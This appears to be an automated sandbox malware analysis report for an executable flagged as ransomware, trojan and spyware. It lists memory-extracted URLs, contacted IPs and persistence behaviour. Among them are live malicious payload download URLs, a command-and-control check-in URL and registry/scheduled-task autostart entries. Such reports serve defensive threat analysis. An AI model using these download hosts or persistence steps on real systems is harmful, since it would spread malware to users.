https://aka.ms/AA23z1a	U59WtZz2Sg.exe, 00000005.00000003.469204147.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.449920000.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.450333989.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.468930777.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.447608292.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.446128369.0000000003060000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.471179889.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.470164900.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.459195110.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.458107166.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.471657839.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.469951048.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.446549026.0000000003060000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.454318911.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.462575287.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.445860097.0000000003060000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.470405278.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.461142803.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.467350799.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.454777697.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.460776709.0000000000610000.00000004.00001000.00020000.00000000.sdmp	false		high
https://res-a.akamaihd.net/__media__/pics/8000/72/941/fallback1.jpg	U59WtZz2Sg.exe, 00000005.00000003.497150466.0000000000610000.00000004.00001000.00020000.00000000.sdmp	false		high
https://drive.google.com/	U59WtZz2Sg.exe, 00000005.00000003.545471776.0000000000610000.00000004.00001000.00020000.00000000.sdmp	false		high
http://www.msn.com/?ocid=iehp	U59WtZz2Sg.exe, 00000005.00000003.421301397.000000000306C000.00000004.00001000.00020000.00000000.sdmp	false		high
https://mail.google.com/mail/B	U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp	false		high
https://api.2ip.ua/geo.json=P	U59WtZz2Sg.exe, 00000001.00000002.309333015.0000000000827000.00000004.00000020.00020000.00000000.sdmp	false		high
https://drive.google.com/?lfhs=2	U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp	false		high
https://onedrive.live.com/about/en-us/0	U59WtZz2Sg.exe, 00000005.00000003.462575287.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.445860097.0000000003060000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.461142803.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.460215496.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.450591507.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.458323064.0000000000610000.00000004.00001000.00020000.00000000.sdmp	false		high
https://api.2ip.ua/geo.jsongP	U59WtZz2Sg.exe, 00000001.00000002.309333015.0000000000827000.00000004.00000020.00020000.00000000.sdmp	false		high
https://we.tl/t-5UcwRdS3ED	U59WtZz2Sg.exe, 00000005.00000002.577338464.0000000000908000.00000004.00000020.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.385599244.0000000000908000.00000004.00000020.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000002.577980822.0000000002F50000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://www.youtube.com/s/notifications/manifest/cr_install.html	U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp	false		high
https://www.youtube.com/B	U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp	false		high
http://www.reddit.com/	U59WtZz2Sg.exe, 00000005.00000003.350865270.0000000003060000.00000004.00001000.00020000.00000000.sdmp	false		high
http://www.qt.io/contact-us.	U59WtZz2Sg.exe, 00000005.00000003.530047759.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.528005153.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.527905885.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.527699347.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.529404894.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.528855392.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.528097089.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.528636685.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.529863093.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.529604993.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.528540404.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.527571080.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.528204840.0000000000610000.00000004.00001000.00020000.00000000.sdmp	false		high
https://www.youtube.com/?feature=ytca	U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp	false		high
http://www.ecma-international.org/ecma-262/5.1/#sec-C	U59WtZz2Sg.exe, 00000005.00000003.545871666.0000000000610000.00000004.00001000.00020000.00000000.sdmp	false		high
https://github.com/google/closure-library/wiki/goog.module:-an-ES6-module-like-alternative-to-goog.p	U59WtZz2Sg.exe, 00000005.00000003.545871666.0000000000610000.00000004.00001000.00020000.00000000.sdmp	false		high
https://www.google.com/chrome/application/x-msdownloadC:	U59WtZz2Sg.exe, 00000005.00000003.420123871.0000000003060000.00000004.00001000.00020000.00000000.sdmp	false		high
https://docs.google.com/presentation/	U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp	false		high
http://www.gnu.org/licenses/gpl-2.0.html.	U59WtZz2Sg.exe, 00000005.00000003.530047759.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.528005153.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.527905885.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.527699347.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.529404894.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.528855392.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.528097089.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.528636685.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.529863093.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.529604993.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.528540404.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.527571080.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.528204840.0000000000610000.00000004.00001000.00020000.00000000.sdmp	false		high
https://we.tl/t-5UcwRdS3	U59WtZz2Sg.exe, 00000005.00000002.577980822.0000000002F50000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://payments.google.com/payments/v4/js/integrator.js	U59WtZz2Sg.exe, 00000005.00000003.546543404.0000000000610000.00000004.00001000.00020000.00000000.sdmp	false		high
https://www.gnu.org/licenses/lgpl.html.	U59WtZz2Sg.exe, 00000005.00000003.530047759.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.528005153.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.527905885.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.527699347.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.529404894.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.528855392.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.528097089.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.528636685.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.529863093.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.529604993.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.528540404.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.527571080.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.528204840.0000000000610000.00000004.00001000.00020000.00000000.sdmp	false		high
https://api.2ip.ua/geo.jsonl	U59WtZz2Sg.exe, 00000001.00000002.309333015.0000000000827000.00000004.00000020.00020000.00000000.sdmp	false		high
https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1	U59WtZz2Sg.exe, 00000005.00000003.497150466.0000000000610000.00000004.00001000.00020000.00000000.sdmp	false		high
http://fresherlights.com/files/1/build3.exe(	U59WtZz2Sg.exe, 00000005.00000003.385085396.0000000002FB9000.00000004.00000800.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.522838758.0000000002FB2000.00000004.00000800.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.388272737.0000000002FB9000.00000004.00000800.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.487679398.0000000002FAA000.00000004.00000800.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.542575948.0000000002FAA000.00000004.00000800.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.488792776.0000000002FB2000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://api.2ip.ua/geo.jsonk	U59WtZz2Sg.exe, 00000001.00000003.306241286.000000000089F000.00000004.00000020.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000001.00000003.308057042.000000000089F000.00000004.00000020.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000001.00000003.306100466.000000000089F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.youtube.com/	U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp	false		high
http://uaery.top/dl/build2.exe$run	U59WtZz2Sg.exe, 00000005.00000002.574964169.00000000008AD000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.msn.com/	U59WtZz2Sg.exe, 00000005.00000003.421301397.000000000306C000.00000004.00001000.00020000.00000000.sdmp	false		high
https://docs.google.com/spreadsheets/	U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp	false		high
https://api.2ip.ua/geo.json=	U59WtZz2Sg.exe, 00000001.00000002.309333015.0000000000827000.00000004.00000020.00020000.00000000.sdmp	false		high
http://fresherlights.com/test1/get.php?pid=903E7F261711F85395E5CEFBF4173C54&first=trueW	U59WtZz2Sg.exe, 00000005.00000003.385404722.00000000008AD000.00000004.00000020.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000002.574964169.00000000008AD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://api.2ip.ua/B	U59WtZz2Sg.exe, 00000001.00000002.309333015.0000000000827000.00000004.00000020.00020000.00000000.sdmp	false		high
http://sodipodi.sourceforge.net/DTD/sodipodi-0.dtd	U59WtZz2Sg.exe, 00000005.00000003.507888546.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.501922929.0000000000610000.00000004.00001000.00020000.00000000.sdmp	false		high
https://api.2ip.ua/geo.json5	U59WtZz2Sg.exe, 00000001.00000002.309333015.0000000000827000.00000004.00000020.00020000.00000000.sdmp	false		high
http://aka.ms/rmssdk)	U59WtZz2Sg.exe, 00000005.00000003.450591507.0000000000610000.00000004.00001000.00020000.00000000.sdmp	false		high
http://www.youtube.com/	U59WtZz2Sg.exe, 00000005.00000003.351612553.0000000003060000.00000004.00001000.00020000.00000000.sdmp	false		high
https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7BE6B7572D	U59WtZz2Sg.exe, 00000005.00000003.420123871.0000000003060000.00000004.00001000.00020000.00000000.sdmp	false		high
https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=02Google	U59WtZz2Sg.exe, 00000005.00000003.496991699.0000000000610000.00000004.00001000.00020000.00000000.sdmp	false		high
http://www.qt.io/terms-conditions.	U59WtZz2Sg.exe, 00000005.00000003.530047759.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.528005153.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.527905885.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.527699347.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.529404894.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.528855392.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.528097089.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.528636685.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.529863093.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.529604993.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.528540404.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.527571080.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.528204840.0000000000610000.00000004.00001000.00020000.00000000.sdmp	false		high
http://www.openssl.org/)	U59WtZz2Sg.exe, 00000005.00000003.408637409.0000000003060000.00000004.00001000.00020000.00000000.sdmp	false		high
http://www.inkscape.org/namespaces/inkscape	U59WtZz2Sg.exe, 00000005.00000003.507888546.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.501922929.0000000000610000.00000004.00001000.00020000.00000000.sdmp	false		high
https://www.google.com/	U59WtZz2Sg.exe, 00000005.00000003.546543404.0000000000610000.00000004.00001000.00020000.00000000.sdmp	false		high
https://docs.google.com/document/	U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp	false		high
http://www.qt.io/licensing/	U59WtZz2Sg.exe, 00000005.00000003.530047759.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.528005153.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.527905885.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.527699347.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.529404894.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.528855392.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.528097089.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.528636685.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.529863093.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.529604993.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.528540404.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.527571080.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.528204840.0000000000610000.00000004.00001000.00020000.00000000.sdmp	false		high
https://mail.google.com/mail/installwebapp?usp=chrome_default	U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp	false		high
https://drive.google.com/drive/installwebapp?usp=chrome_default	U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp	false		high
https://www.google.com/chrome/static/images/favicons/favicon-16x16.png	U59WtZz2Sg.exe, 00000005.00000003.444451772.0000000003060000.00000004.00001000.00020000.00000000.sdmp	false		high
http://www.amazon.com/	U59WtZz2Sg.exe, 00000005.00000003.349908003.0000000003060000.00000004.00001000.00020000.00000000.sdmp	false		high
https://docs.google.com/presentation/B	U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp	false		high
https://docs.google.com/document/installwebapp?usp=chrome_default	U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp	false		high
https://sandbox.google.com/payments/v4/js/integrator.js	U59WtZz2Sg.exe, 00000005.00000003.546543404.0000000000610000.00000004.00001000.00020000.00000000.sdmp	false		high
http://www.twitter.com/	U59WtZz2Sg.exe, 00000005.00000003.350997403.0000000003060000.00000004.00001000.00020000.00000000.sdmp	false		high
https://docs.google.com/presentation/:	U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp	false		high
https://docs.google.com/presentation/installwebapp?usp=chrome_default	U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp	false		high
http://www.openssl.org/support/faq.html	U59WtZz2Sg.exe, 00000005.00000000.314284082.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false		high
http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Error	U59WtZz2Sg.exe, 00000000.00000002.305141359.0000000002220000.00000040.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000001.00000000.303569533.0000000000400000.00000040.00000400.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000001.00000002.309064408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000001.00000000.301786839.0000000000400000.00000040.00000400.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000003.00000002.318481347.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000004.00000002.362805036.0000000002280000.00000040.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000000.317450025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000002.564528734.0000000000400000.00000040.00000400.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000000.314284082.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://docs.google.com/spreadsheets/?usp=installed_webapp	U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp	false		high
https://login.microsoftonline.com/common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96e	U59WtZz2Sg.exe, 00000005.00000003.496991699.0000000000610000.00000004.00001000.00020000.00000000.sdmp	false		high
https://docs.google.com/spreadsheets/B	U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp	false		high
http://aka.ms/sia	U59WtZz2Sg.exe, 00000005.00000003.450591507.0000000000610000.00000004.00001000.00020000.00000000.sdmp	false		high
https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2	U59WtZz2Sg.exe, 00000005.00000003.497150466.0000000000610000.00000004.00001000.00020000.00000000.sdmp	false		high
http://fresherlights.com/files/1/build3.exe$run	U59WtZz2Sg.exe, 00000005.00000003.385404722.00000000008AD000.00000004.00000020.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000002.574964169.00000000008AD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://docs.google.com/spreadsheets/:	U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp	false		high
http://www.freetype.org	U59WtZz2Sg.exe, 00000005.00000003.408637409.0000000003060000.00000004.00001000.00020000.00000000.sdmp	false		high
https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0	U59WtZz2Sg.exe, 00000005.00000003.496991699.0000000000610000.00000004.00001000.00020000.00000000.sdmp	false		high
http://uaery.top/dl/build2.exerunk6	U59WtZz2Sg.exe, 00000005.00000003.385286762.000000000086A000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://facebook.github.io/react/docs/error-decoder.html?invariant	U59WtZz2Sg.exe, 00000005.00000003.536209004.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.536117643.0000000000610000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.nytimes.com/	U59WtZz2Sg.exe, 00000005.00000003.350793064.0000000003060000.00000004.00001000.00020000.00000000.sdmp	false		high
https://drive.google.com/:	U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp	false		high
https://api.2ip.ua/	U59WtZz2Sg.exe, 00000001.00000002.309333015.0000000000827000.00000004.00000020.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.385286762.000000000086A000.00000004.00000020.00020000.00000000.sdmp	false		high
http://aka.ms/rmsfaq)	U59WtZz2Sg.exe, 00000005.00000003.450591507.0000000000610000.00000004.00001000.00020000.00000000.sdmp	false		high
https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=5864849777998;gtm=	U59WtZz2Sg.exe, 00000005.00000003.496991699.0000000000610000.00000004.00001000.00020000.00000000.sdmp	false		high
https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=5864849777998;gt	U59WtZz2Sg.exe, 00000005.00000003.496991699.0000000000610000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://aka.ms/Vh5j3k	U59WtZz2Sg.exe, 00000005.00000003.457247775.0000000000610000.00000004.00001000.00020000.00000000.sdmp	false		high
http://creativecommons.org/ns#	U59WtZz2Sg.exe, 00000005.00000003.507888546.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.501922929.0000000000610000.00000004.00001000.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
116.121.62.237	uaery.top	Korea Republic of	9578	CJNET-ASCheiljedangCoIncKR	true
88.198.94.71	unknown	Germany	24940	HETZNER-ASDE	false
162.0.217.254	api.2ip.ua	Canada	35893	ACPCA	false
222.236.49.123	fresherlights.com	Korea Republic of	9318	SKB-ASSKBroadbandCoLtdKR	true
149.154.167.99	t.me	United Kingdom	62041	TELEGRAMRU	false

General Information

Joe Sandbox Version:	36.0.0 Rainbow Opal
Analysis ID:	756302
Start date and time:	2022-11-30 00:21:09 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 13m 39s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	U59WtZz2Sg.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	24
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.rans.troj.spyw.evad.winEXE@32/1330@8/5
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 93.5% (good quality ratio 87.2%) Quality average: 80.4% Quality standard deviation: 29.9%
HCA Information:	Successful, ratio: 93% Number of executed functions: 20 Number of non-executed functions: 87
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): client.wns.windows.com, ctldl.windowsupdate.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadFile calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Report size getting too big, too many NtWriteFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
00:22:11	Task Scheduler	Run new task: Time Trigger Task path: C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe s>--Task
00:22:14	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run SysHelper "C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe" --AutoStart
00:22:18	API Interceptor	1x Sleep call for process: U59WtZz2Sg.exe modified
00:22:24	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run SysHelper "C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe" --AutoStart
00:22:28	Task Scheduler	Run new task: Azure-Update-Task path: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
116.121.62.237	file.exe	Get hash	malicious	Browse	dowe.at/tmp/
	file.exe	Get hash	malicious	Browse	dowe.at/tmp/
	file.exe	Get hash	malicious	Browse	dowe.at/tmp/
	file.exe	Get hash	malicious	Browse	dowe.at/tmp/
	file.exe	Get hash	malicious	Browse	dowe.at/tmp/
	file.exe	Get hash	malicious	Browse	freeshmex.at/tmp/
	file.exe	Get hash	malicious	Browse	freeshmex.at/tmp/
	file.exe	Get hash	malicious	Browse	freeshmex.at/tmp/
	file.exe	Get hash	malicious	Browse	freeshmex.at/tmp/
	file.exe	Get hash	malicious	Browse	freeshmex.at/tmp/
	file.exe	Get hash	malicious	Browse	freeshmex.at/tmp/
	file.exe	Get hash	malicious	Browse	freeshmex.at/tmp/
	file.exe	Get hash	malicious	Browse	freeshmex.at/tmp/
	file.exe	Get hash	malicious	Browse	freeshmex.at/tmp/
	file.exe	Get hash	malicious	Browse	freeshmex.at/tmp/
	file.exe	Get hash	malicious	Browse	freeshmex.at/tmp/
	file.exe	Get hash	malicious	Browse	freeshmex.at/tmp/
	e50G9IljDp.exe	Get hash	malicious	Browse	freeshmex.at/tmp/
	file.exe	Get hash	malicious	Browse	freeshmex.at/tmp/
	file.exe	Get hash	malicious	Browse	freeshmex.at/tmp/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
uaery.top	SyyMuhzBJ3.exe	Get hash	malicious	Browse	37.34.248.24
	file.exe	Get hash	malicious	Browse	190.147.188.50
	b7tUR4gfU4.exe	Get hash	malicious	Browse	109.98.58.98
